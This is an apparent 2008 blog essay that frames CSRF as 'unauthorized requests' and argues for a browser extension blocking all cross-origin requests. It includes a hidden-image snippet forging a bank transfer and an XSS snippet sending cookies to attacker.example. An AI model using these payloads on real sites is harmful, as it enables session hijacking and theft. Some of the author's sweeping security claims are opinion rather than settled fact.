The Snare Of Unauthorized Requests
April 21, 2008 – 8:02 AM
Almost everyone knows what CSRF, or better, unauthorized requests, are. I never really embraced CSRF as the correct term for unauthorized request issues, because the term is outdated and inadequate for contemporary hacking. For me, an unauthorized request is the layer, or the automation, of a hacking procedure that needs no direct intervention from the hacker. I usually illustrate this by comparing unauthorized requests to a trap, or snare, as used by survivalists and hunters. The snare is automated to catch, and the victim triggers his own capture because of that automation. There isn't much skill involved; it is easy to set up. The only thing an attacker needs to do is wait.
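To make the snare concrete, here is a minimal sketch of what such an automated trap could look like, written as a script on an attacker-hosted page; the target URL and parameters are invented purely for illustration.

```typescript
// Hypothetical "snare" page an attacker hosts; the URL and parameters are
// made up for illustration. A logged-in victim only has to load the page:
// the browser fires the request automatically and attaches the victim's own
// session cookie, so the victim springs the trap on himself.
const trap = document.createElement("img");
trap.style.display = "none"; // nothing visible, nothing to click
// A state-changing GET request riding on whatever session the victim has open.
trap.src = "https://bank.example/transfer?to=attacker&amount=1000";
document.body.appendChild(trap);
```

The attacker does nothing at this point except wait for a victim who happens to be logged in at the target site.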
Web application vulnerabilities.
Most vulnerabilities come down to unauthorized requests being made. Almost all cross-site scripting attacks are only useful when an unauthorized request is made: in order to do something more useful than pop alert boxes, attackers need to make remote, non-same-origin requests, like logging cookies, phoning home, or pulling in a worm. SQL injection can also be carried out through unauthorized requests, since it is often nothing more than a crafted GET request passed verbatim to the database. If I am very strict, I will even say that SQL injection is request abuse of the programming layer; in that case the software itself is the victim of the unauthorized request. Even many vulnerabilities designed to exploit browsers sometimes rely on unauthorized requests within the browser's architecture, such as calling system functions or browser internals that should never be exposed in a secure browser.
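As a sketch of that phoning-home step: the injected script below only becomes useful once it makes a request outside the same origin. The collector host is invented for illustration.

```typescript
// Hypothetical exfiltration step of an XSS payload; attacker.example is an
// invented collector host. Without this non-same-origin request, the stolen
// cookie never leaves the victim's browser.
const beacon = new Image();
beacon.src =
  "https://attacker.example/collect?c=" + encodeURIComponent(document.cookie);
```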
So CSRF, or unauthorized requests, are multi-dimensional and can appear in any place. It is very important to understand that they are only a distribution layer for the actual payload, whether that is session stealing, cookie stealing, or a completely automated reconfiguration of your router. The attack is automated, instead of directly targeted like most network attacks are. With this in mind, I like to stress the importance of the distribution layer over its payload: without distribution the payload cannot be transported, so for any of these attacks to work the distribution layer must be flawed. Preventing unauthorized requests should be the focus in web application security, because we can keep inventing new rules, signatures, and vectors, but as we have all learned that is an arms race which is very difficult to win, and it won't stop unknown attacks that have yet to be invented.
TCP/IP and browsers.
Somewhere along the road, everyone decided it was normal to hotlink images or scripts from other networks into your own network. This explicitly violates a very crucial same-origin policy rule; in fact, it violates all security restrictions. If the same-origin policy means anything, it means that networks should not interact verbatim, but only under strict rules. This is exactly what is wrong with the Internet as a whole: it is all connected together, and browsers and email clients let a single page fire off requests to any number of other origins, which results in the issues we face these days. For what reason do we fetch data from other servers when we can serve the data ourselves? I cannot think of any valid reason why we should fetch data and include it in our own network or browser client. Is there any valid reason why my browser should be allowed to access my file system? My browser can be tricked into making unauthorized requests by a crafted HTML email, and that request gets full browser permissions because the browser thinks we asked for it. Why isn't there a separate application strictly designed to navigate the file system, with the browser reserved for outside networks? Why should my browser fetch Flash or JavaScript from servers that are not same-domain? Why don't we block it all?
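For reference, here is a minimal sketch of the strict rule the same-origin policy actually encodes, assuming the standard definition that compares scheme, host, and port; the function name is illustrative and not part of any browser API.

```typescript
// Two URLs belong to the same origin only when scheme, host, and port all match.
function sameOrigin(a: string, b: string): boolean {
  const u1 = new URL(a);
  const u2 = new URL(b);
  return u1.protocol === u2.protocol && u1.hostname === u2.hostname && u1.port === u2.port;
}

// A hotlinked third-party script fails the test:
sameOrigin("https://mysite.example/page.html", "https://cdn.other.example/widget.js"); // false
```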
Solutions.
I hear you: it will break features. Screw the features, that is an excuse. There isn't anything I cannot do without requesting third-party information on a website. So what is the solution? I have given it a lot of thought, and I came to the conclusion that it is up to the browser vendors to enforce content policies. I am not sure how far their efforts have progressed in this area, and since I do not want to wait, I announced that I am starting to build an extension for Firefox that enforces content restrictions, or better: blocks all requests that reach beyond the same-domain scope. If it succeeds, the only attacks that remain are those performed within the same-origin domain. Those cannot be stopped, but again, when you want to do something interesting you still need to make requests beyond the same origin to store or log the stolen data. So it leaves us only with low-level attacks, and notably phishing, which isn't a security issue but a user-education issue.
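To give a rough idea of the core decision such an extension has to make for every outgoing request, here is a minimal sketch, assuming it can see both the URL of the page making the request and the URL being requested; the function and parameter names are invented and are not the extension's actual code.

```typescript
// Illustrative only: the per-request rule an extension like this would apply.
// Names are made up; this is not the real extension's API.
function shouldBlock(pageUrl: string, requestUrl: string): boolean {
  const pageHost = new URL(pageUrl).hostname;
  const requestHost = new URL(requestUrl).hostname;
  // Allow only requests that stay within the same-domain scope.
  return pageHost !== requestHost;
}

shouldBlock("http://example.com/index", "http://example.com/style.css"); // false: allowed
shouldBlock("http://example.com/index", "http://evil.example/log");      // true: blocked
```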
There are few drawbacks, really: a machine must do what I tell it to do, not the other way around. So stopping unauthorized requests at their root is the bare minimum to me.
Source: 0x000000